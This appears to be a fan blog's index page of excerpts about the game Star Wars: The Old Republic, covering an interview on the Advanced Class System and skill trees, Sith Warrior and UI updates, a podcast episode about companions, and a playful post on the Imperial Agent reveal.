Principal Lead Combat Designer Georg Zoeller sat down with us to discuss the design philosophy behind the Advanced Class System, skill trees, and how one spec should at least get you through the entire leveling process.  We end with our Yes/No/Pass game, which Georg later calls some kind of Jedi Mind Trick.  Here are the main points from the interview:

  • When will we be seeing all the skill trees and Advanced Class roles? “I think you’ll see us becoming more detailed about these things pretty soon.” Continue reading »

Today’s update is all about the Sith Warrior character progression and a look at developing the user interface (UI) for SWTOR. We got a sneak peek at this trailer while in Austin this past Monday and were blown away by some of the moves of the Sith Warrior and specifically how terrific the armor looks. For more details visit the official site here.

Lead UI Artist, Michael Voigt, describes how the current UI was developed. Read more on the official website here.

Making Up for Too Many Dark Side Choices

Join the discussion about this episode here.

It’s just the home team this week, which is probably good because there was a TON of new information to cover.  We’re excited that companions are back to the forefront again – companions in flashpoint player slots and dev tracker talk about companion romances.  We also find out Carla won’t save seats in a movie theater.

Fact or Fiction: Can you pick out the confirmed fact from the tall tales?  This week’s host challenge involves the titles, underwater shenanigans, and companions. Continue reading »

Principal Lead Combat Designer Georg Zoeller gave the gameplay/mechanics crowd a developer’s blog packed with information on the Advanced Class System.  Lots to chew over as we consider a game where 75% of the classes can heal and 75% of the classes can tank.  Here are some highlights:

  • At level 10, characters will choose an Advanced Class on their capital planet.
  • Sith Warrior trees: Immortal (Juggernaut), Annihilation (Marauder), and Rage (shared) Continue reading »

Smooth Criminal Haz Orbital Bombardment

Praise the Friday Update gods, they brought us to the Promised Land!  After a dry season of no gameplay information, BioWare said unto its fans, “Have faith and you shall have your fill.”  But the people hardened their hearts and they cried out into cyberspace, the void of which is terrible deep, magnifying the clatter of voices in endless echoes of dissatisfaction.  And lo, just when the night’s gloom was unpierced even by the tiniest spark of hope and most silent, a light blazed across the horizon, and broke the spine of the dark, whining beast.  “Behold,” said BioWare, “We bring you glad tidings of great joy!  We give you the Imperial Agent, the smoothest of all criminals!  We give you PvP and Crafting!  We’ll even let you change that Advanced Class name you hated so much.”

And the beast retreated into its place of lurking and the fans were mollified.  For now. Continue reading »
